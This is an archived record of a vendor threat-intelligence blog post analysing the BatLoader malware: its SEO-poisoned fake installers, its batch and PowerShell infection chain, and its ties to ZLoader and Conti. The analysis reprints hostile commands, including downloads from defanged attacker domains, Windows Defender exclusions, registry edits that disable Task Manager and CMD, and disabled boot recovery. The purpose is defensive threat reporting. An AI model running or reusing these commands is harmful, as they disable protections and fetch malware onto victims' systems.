{
	"id": "e07bb547-45e1-4fc2-bb8a-571e8088352d",
	"created_at": "2026-04-06T00:07:29.080797Z",
	"updated_at": "2026-04-10T03:20:38.453718Z",
	"deleted_at": null,
	"sha1_hash": "6f0812339446d96b5d0fdf215df61af6d4e5d875",
	"title": "BATLOADER: The Evasive Downloader Malware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2819322,
	"plain_text": "BATLOADER: The Evasive Downloader Malware\r\nBy Bethany Hardin, Lavine Oluoch, Tatiana Vollbrecht\r\nPublished: 2022-11-14 · Archived: 2026-04-05 18:06:37 UTC\r\nContributors: Deborah Snyder and Nikki Benoit\r\nExecutive Summary\r\nVMware Carbon Black Managed Detection and Response (MDR) analysts are constantly handling security incidents\r\nwithin our customer environments and tracking emerging and persistent malware campaigns. One such threat that has\r\nbeen particularly prevalent over the last couple of months is BatLoader.  Named by Mandiant [1], BatLoader is an\r\ninitial access malware that heavily uses batch and PowerShell scripts to gain a foothold on a victim machine and\r\ndeliver other malware. The threat actors utilize search engine optimization (SEO) poisoning to lure users to download\r\nthe malware from compromised websites. The use of living-off-the-land binaries makes this campaign hard to detect\r\nand block especially early on in the attack chain.\r\nIn this article, we will explore this malware campaign, addressing the history of BatLoader, its attributes, how it is\r\ndelivered, the infection chain, and Carbon Black’s detection of the malware.\r\nAttributes and Attribution\r\nThere are several attributes that are unique to BatLoader’s attack methodology that Carbon Black’s MDR team has\r\nseen in infected customer environments. The following can be used as a fingerprint to identify the malicious files\r\n(based on the OLE file information provided by VT):\r\nAuthor | Signer | Subject\r\nSoftland | MK Investment Properties | Novapdf 11 tools\r\nTest | Tax In Cloud sp. z o.o. | SetupProject1\r\nCloud | Kancelaria Adwokacka Adwokat Aleksandra Krzemińska | Cloud\r\nTable 1: OLE File information for identified Batloader samples\r\nOther fingerprints pulled from the code can also be used to identify BatLoader files:\r\n1\r\nSet-Location “$Env:USERPROFILE\\AppData\\Roaming”\r\nInvoke-WebRequest hxxtps://updatea1[.]com/g5\r\nhttps://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html\r\nPage 1 of 19\n\n2\r\nSet-Location “$Env:USERPROFILE\\AppData\\Roaming”\r\nInvoke-WebRequest hxxp://cloudupdatesss[.]com\r\nWhile researching BatLoader, the team discovered several attributes within the attack chain that are similar to\r\nprevious activity linked to Conti. Evidence collected includes an IP address (134[.]0[.]117[.]195 – firsone1[.]online)\r\nthat was previously used by Conti in a ransomware campaign leveraging Log4J [2], as well as techniques that Conti\r\nhas used in other attacks. One of the techniques identified was the use of the Atera agent which has similarities to\r\nConti’s previous techniques for their ransomware operations. Mandiant had previously released research on\r\nBatLoader and commented that activity from BatLoader overlaps with techniques that were released with Conti’s\r\nleaks in August 2021 [1].\r\nThis is not to say that Conti is responsible for BatLoader. Unaffiliated actors may be replicating the techniques of the\r\ngroup, especially since the Conti Leaks of August 2021.  Interestingly, Carbon Black’s MDR and Threat Analysis Unit\r\n(TAU) team did not find BatLoader being sold on the dark web, suggesting this may be a campaign by a single\r\nactor/group and not being sold as a service.\r\nBatLoader vs ZLoader\r\nWhile researching the pre-existing information on BatLoader published on the public internet, there seemed to be\r\nsome confusion as to whether BatLoader and Zloader, a banking trojan, are one and the same.
For example, looking\r\nup this file on VirusTotal we see that different antivirus engines group it in the Zloader malware family. The same file\r\nhas been referenced in community-contributed IOC collections for both Zloader and Batloader.\r\nFigure 1: Malware family analysis for a ZLoader Sample from VT\r\nThought to be derived from the Zeus banking trojan from the early 2000s, the Zloader malware has been observed in\r\nhundreds of campaigns over the years, evolving over time and improving its effectiveness against its targeted victims\r\n[3].  In 2021, security researchers reported a change in Zloader’s delivery method as well as key changes in its attack\r\nchain. The malware operators moved away from phishing email campaigns (more information can be found in TAU-TIN ZLoader) and were now using malicious advertisements to lure users to download signed Windows installer\r\n(.msi) files. These file downloads are disguised as installers for legitimate software such as TeamViewer, Zoom,\r\nDiscord, JavaPlugin etc. Once installed, Zloader uses batch scripts to progress in the attack chain using the following\r\ntactics:\r\nelevating privileges\r\nevading defenses by disabling Defender using Nsudo\r\nestablishing persistence\r\ndownloading additional payloads using the PowerShell cmdlet Invoke-WebRequest.\r\nFinally, the threat actor leverages CVE-2013-3900 and CVE-2020-1599 to execute a malicious script appended to a\r\nsigned Windows dll that injects the main Zloader dll into an msiexec.exe process. Msiexec.exe then maintains\r\ncommunication with the C2 server.  In April 2022, Microsoft’s Digital Crime Unit (DCU) took down over 60 domains\r\nthat were controlled by the threat actor group behind ZLoader, disrupting their botnet [4].\r\nIn many ways, Batloader draws familiarity from the previously known ZLoader.
Our team analyzed the initial steps of\r\ncompromise utilizing the two malware samples presented in the chart below to provide an accurate comparison.\r\nMalware | File Name | SHA-256 Hash\r\nBatLoader | zoom.msi | 3ec3c66c0099682250fe06db400f42ec7be9a0f4641eaad8473ccd8b28a48042\r\nZLoader | zoom.msi / Team-viewer.msi | 2c0d8fc0740598fa97c5d1b21edb011c8026740b77029d29c20f3275438ebfbd\r\nWhere these two malware types draw substantial similarities is through their use of SEO poisoning, leveraging\r\nWindows Installer, and their use of the native OS binaries during the attack delivery process.\r\nFigure 2: Powershell command from Zloader \u0026 Batloader samples\r\nWith these similarities, we cannot conclude that these malware variants are entirely separate from each other, and of\r\nfurther note, some of the collected samples of Batloader and ZLoader both had an identical creation date and time\r\nwithin the file’s OLE metadata.\r\nFigure 3: OLE comparison for Batloader and ZLoader Hash from VirusTotal\r\nDespite the resemblance between Batloader and Zloader, there are some differences worth noting. On average,\r\nBatloader samples are larger at ~107 MB while ZLoader is only about ~705 KB.
This is consistent with the amount\r\nof activity that is seen with Batloader from the start.\r\nWhile it could not be verified whether or not the two malware variants are linked to the same threat actors, based on\r\nthe malicious code used and shifts in attack delivery methods, our team’s findings align with Walmart [5] and\r\nMandiant [1] that BatLoader is indeed an extension beyond ZLoader.\r\nFigure 4: Comparing ZLoader (most recent campaign) and BatLoader attack chain\r\nBatLoader Delivery\r\nNote: Batloader continues to evolve and we have seen different execution steps from different samples. Although the\r\ncore functionality remains the same, the malware operators use different scripts (both in name and content) possibly\r\nto make detection more difficult. For simplicity, we only analyzed one of the three variations we encountered. The\r\nIOC section below lists scripts and tools used in all the different attack chains.\r\nThe operators of BatLoader malware leverage SEO poisoning to lure potential victims into downloading malicious\r\nMicrosoft Windows Installer (.msi) files.  The msi files can either be directly downloaded, often found in the\r\n/Downloads folder, or are included in a .zip archive file.  The files masquerade as other common legitimate software\r\ninstallers – e.g. zoom.msi, Teamviewer.msi, anydesk.msi – but are actually a copy of the free PDF creator novaPDF.\r\nThe novaPDF installer is edited using the tool Advanced Installer to add a PowerShellScriptInline custom action that\r\nexecutes a malicious PowerShell script.
More on how to create PowerShell custom actions with Advanced Installer\r\ncan be found here.\r\nFigure 5: Zoom.msi custom action\r\nThe PowerShell inline script kicks off the infection when executed during software installation, downloading the first\r\nBatLoader script, update.bat, using the cmdlet Invoke-WebRequest as shown in Figure 6.\r\nFigure 6: PowerShellScriptInline custom action data represents the PowerShell code\r\nFigure 7: Extracted PowerShell code\r\nInfection Chain\r\nThe infection chain relies on batch scripts and PowerShell scripts written to the \\appdata\\roaming directory to gain\r\ninitial access. update.bat downloads requestadmin.bat and nircmd.exe, a command line utility that can be used to gain\r\nadmin privileges with the “elevate” and “elevatecmd” switches.\r\nFigure 8: Contents of Update.bat\r\nNircmd.exe and the initial zoom.msi file are both signed with the same certificate. We have identified three file\r\nsignatures related to BatLoader files at the time of writing this:\r\nMK Investment Properties Inc.\r\nKancelaria Adwokacka Adwokat Aleksandra Krzemińska\r\nTax in Cloud sp. z o.o.\r\nWith elevated privileges, requestadmin.bat downloads and executes runanddelete.bat and scripttodo.ps1.
For defense\r\nevasion, requestadmin.bat also adds exclusions for Windows Defender as listed below:\r\nAdd-MpPreference -ExclusionProcess 'C:\\Users\\\u003cuser\u003e\\AppData\\Roaming'\r\nAdd-MpPreference -ExclusionPath 'C:\\Users\\\u003cuser\u003e\\AppData\\Roaming\\'\r\nAdd-MpPreference -ExclusionPath 'C:\\Users\\\u003cuser\u003e\\'\r\nAdd-MpPreference -ExclusionProcess 'C:\\Users\\\u003cuser\u003e'\r\nAdd-MpPreference -ExclusionProcess 'C:\\Windows*'\r\nAdd-MpPreference -ExclusionExtension \".ps1\"\r\nAdd-MpPreference -ExclusionPath 'C:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\*'\r\nAdd-MpPreference -ExclusionProcess 'C:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\*'\r\nThe PowerShell script scripttodo.ps1 runs some discovery commands as well as downloading and installing a copy of\r\nGpg4win (an email and file encryption package) and Nsudo.exe, a tool used to launch programs with elevated\r\nprivileges.\r\ncomputersystem get domain\r\narp.exe -a\r\nGpg4win is then used to decrypt more payloads.\r\n\"C:\\Program Files (x86)\\GNU\\GnuPG\\gpg2.exe\" --batch --yes --passphrase 105b -o C:\\Users\\\u003cuser\u003e\\AppData\\Roaming\\d2ef5.exe -d C:\\Users\\\u003cuser\u003e\\AppData\\Roaming\\d2ef5.exe.gpg\r\n\"C:\\Program Files (x86)\\GNU\\GnuPG\\gpg2.exe\" --batch --yes --passphrase 105b -o C:\\Users\\\u003cuser\u003e\\AppData\\Roaming\\p9d2s.exe -d C:\\Users\\\u003cuser\u003e\\AppData\\Roaming\\p9d2s.exe.gpg\r\n\"C:\\Program Files (x86)\\GNU\\GnuPG\\gpg2.exe\" --batch --yes --passphrase 105b -o C:\\Users\\\u003cuser\u003e\\AppData\\Roaming\\f827.dll -d C:\\Users\\\u003cuser\u003e\\AppData\\Roaming\\f827.dll.gpg\r\n\"C:\\Program Files (x86)\\GNU\\GnuPG\\gpg2.exe\" --batch --yes --passphrase 105b -o C:\\Users\\\u003cuser\u003e\\AppData\\Roaming\\d655.dll -d 
C:\\Users\\\u003cuser\u003e\\AppData\\Roaming\\d655.dll.gpg\r\nFigure 9: Contents of runanddelete.bat from VT\r\nNsudo is used to impair defenses by adding the registry values ConsentPromptBehaviorAdmin,\r\nNotification_Suppress, DisableTaskMgr, DisableCMD and DisableRegistryTools. These configurations restrict user\r\naccess on the infected device, making remediation difficult.\r\nNsudo -U:T sc config WinDefend start= disabled\r\nNSudo -U:T -ShowWindowMode:Hide reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" /v \"ConsentPromptBehaviorAdmin\" /t REG_DWORD /d \"0\" /f\r\nNSudo -U:T -ShowWindowMode:Hide reg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\UX Configuration\" /v \"Notification_Suppress\" /t REG_DWORD /d \"1\" /f\r\nNSudo -U:T -ShowWindowMode:Hide reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" /v \"DisableTaskMgr\" /t REG_DWORD /d \"1\" /f\r\nNSudo -U:T -ShowWindowMode:Hide reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" /v \"DisableCMD\" /t REG_DWORD /d \"1\" /f\r\nNSudo -U:T -ShowWindowMode:Hide reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" /v \"DisableRegistryTools\" /t REG_DWORD /d \"1\" /f\r\nNSudo -U:T -ShowWindowMode:Hide reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\" /v \"NoRun\" /t REG_DWORD /d \"1\" /f\r\nNsudo -U:T -ShowWindowMode:Hide bcdedit /set {default} recoveryenabled No\r\nNsudo -U:T -ShowWindowMode:Hide bcdedit /set {default} bootstatuspolicy ignoreallfailures\r\nRequestadmin.bat also uses powercfg.exe to modify power settings on the infected device by configuring the lock\r\nscreen timeout.\r\npowercfg.exe /SETACVALUEINDEX SCHEME_CURRENT SUB_VIDEO 
VIDEOCONLOCK 1800\r\npowercfg -change -standby-timeout-dc 3000\r\npowercfg -change -standby-timeout-ac 3000\r\nBatloader has also been observed installing remote monitoring software such as Servably’s Syncro and Atera RMM.\r\nThis ensures the malware operators maintain access to the infected systems.\r\nThe final payloads dropped after infection often include two executables (e.g. d2ef5.exe, p9d2s.exe) and a DLL file\r\n(e.g. f827.dll, d655.dll). Within each of the infections we observed, one of the executable files was a known-bad file\r\nattributed to the Ursnif/Gozi malware family, a banking trojan. The other appeared to be the Arkei/Vidar infostealer. Once\r\nthese executables are set to run, the main dll is also executed. In some incidents, we were able to confirm that the dll\r\nwas a Cobalt Strike stager.\r\nFigure 10: Final DLL payload executed\r\nVMware Carbon Black MDR Response\r\nNew threats are constantly emerging. At VMware Carbon Black we work around the clock to ensure that our products\r\nkeep our customers safe from those very threats and offer MDR, the last wall of defense, to fill the gap between the\r\nknown, evolving and unknown threats.\r\nBatloader is a great example of the benefit of our MDR product. As our team has detailed, this malware variant is\r\nmuch stealthier and embeds itself quite thoroughly within the impacted host device. The Carbon Black sensor is able\r\nto detect specific behaviors of the malware and generate alerts for further analysis. The alerts in themselves did not\r\npaint a holistic picture of the attack.
This would be a challenge for any team that does not have the resources to\r\nconduct an in-depth threat hunt such as those provided by MDR.\r\nThe Endpoint Standard product receives updates for known malicious hashes and blocks all types of Known or\r\nSuspect malware files from executing through behavioral analysis. While the initial payload may be able to\r\ncircumvent detection, it is highly likely that when the malware runs it will trigger other alerts that are indicators of a\r\nmore complex attack, such as the ones highlighted below.\r\nFigure 11: Alert triggered by requestadmin.bat artifact from Batloader malware\r\nFigure 12: Alert triggered by the d2ef5.exe artifact from Batloader malware\r\nMDR Threat Analysts detected this change in tactics and initiated the investigation that has brought us to this point of\r\nhighlighting the nuances and vital differences between Batloader and Zloader and how it could impact our customer\r\nenvironments. The discovered IOCs related to this malicious behavior are documented to ease the next steps for our\r\ncustomers, with Threat Analysts always available for follow-up questions and support.\r\nConclusion\r\nBatLoader’s stealth and persistence are what made this malware stand out from the rest during its latest campaign.\r\nThe MDR team has been highly successful in detecting these attacks, utilizing the written detections within the\r\nCarbon Black sensor and carefully crafted queries that would confirm whether or not the malware is related to\r\nBatLoader. As this variant has a focus on persistence, if it was able to successfully infect the host, it would be vital to\r\nperform the necessary analysis to fully remove the malware or restore from a known good backup.\r\nObserved as early as July of 2022, this malware has already become commonplace as a threat against Carbon Black\r\nMDR customers.
The following diagram illustrates its prevalence across different sectors, with business and financial\r\nservices being prime targets. Since it was first observed by the VMware Carbon Black team there have been at least\r\nthree waves of infection to date, with more to be expected.\r\nFigure 13: Attack prevalence across industries as seen by Carbon Black\r\nThis proves once again that as the threat landscape continues to change, the security industry as a whole needs the\r\ntools, knowledge, and collaboration to be able to detect and block the latest discovered techniques.  Here at VMware\r\nCarbon Black, the MDR team and TAU heavily rely on communication and collaboration to ensure that our products\r\nare able to stand against these threats in a timely manner as they continue to evolve. Our teams measure our success\r\nthrough our ability to adapt and persevere on this ever-changing battlefield.\r\nIndicators of Compromise (IOCs)\r\nReference List\r\n[1]    N. C. Kiat, A. Del Rosario, M. Co. “Zoom For You — SEO Poisoning to Distribute BATLOADER and Atera Agent.” Mandiant. https://www.mandiant.com/resources/blog/seo-poisoning-batloader-atera (accessed October, 2022).\r\n[2]    L. Ilascu. “Conti ransomware uses Log4j bug to hack VMware vCenter servers.” Bleeping Computer. https://www.bleepingcomputer.com/news/security/conti-ransomware-uses-log4j-bug-to-hack-vmware-vcenter-servers/\r\n[3]    D. Schwarz, M. Mesa, Proofpoint Research Team. “ZLoader Loads Again: New ZLoader Variant Returns.” Proofpoint. https://www.proofpoint.com/us/blog/threat-insight/zloader-loads-again-new-zloader-variant-returns (accessed October, 2022).\r\n[4]    A. Hogan-Burney. “Notorious cybercrime gang’s botnet disrupted.” Microsoft. https://blogs.microsoft.com/on-the-issues/2022/04/13/zloader-botnet-disrupted-malware-ukraine/ (accessed October, 2022).\r\n[5]    J. Reaves, J. Platt. “Revisiting BatLoader C2 structure.” Walmart Global Tech Blog. https://medium.com/walmartglobaltech/revisiting-batloader-c2-structure-52f46ff9893a (accessed October, 2022).\r\nSource: https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MITRE"
	],
	"references": [
		"https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html"
	],
	"report_names": [
		"batloader-the-evasive-downloader-malware.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434049,
	"ts_updated_at": 1775791238,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6f0812339446d96b5d0fdf215df61af6d4e5d875.pdf",
		"text": "https://archive.orkl.eu/6f0812339446d96b5d0fdf215df61af6d4e5d875.txt",
		"img": "https://archive.orkl.eu/6f0812339446d96b5d0fdf215df61af6d4e5d875.jpg"
	}
}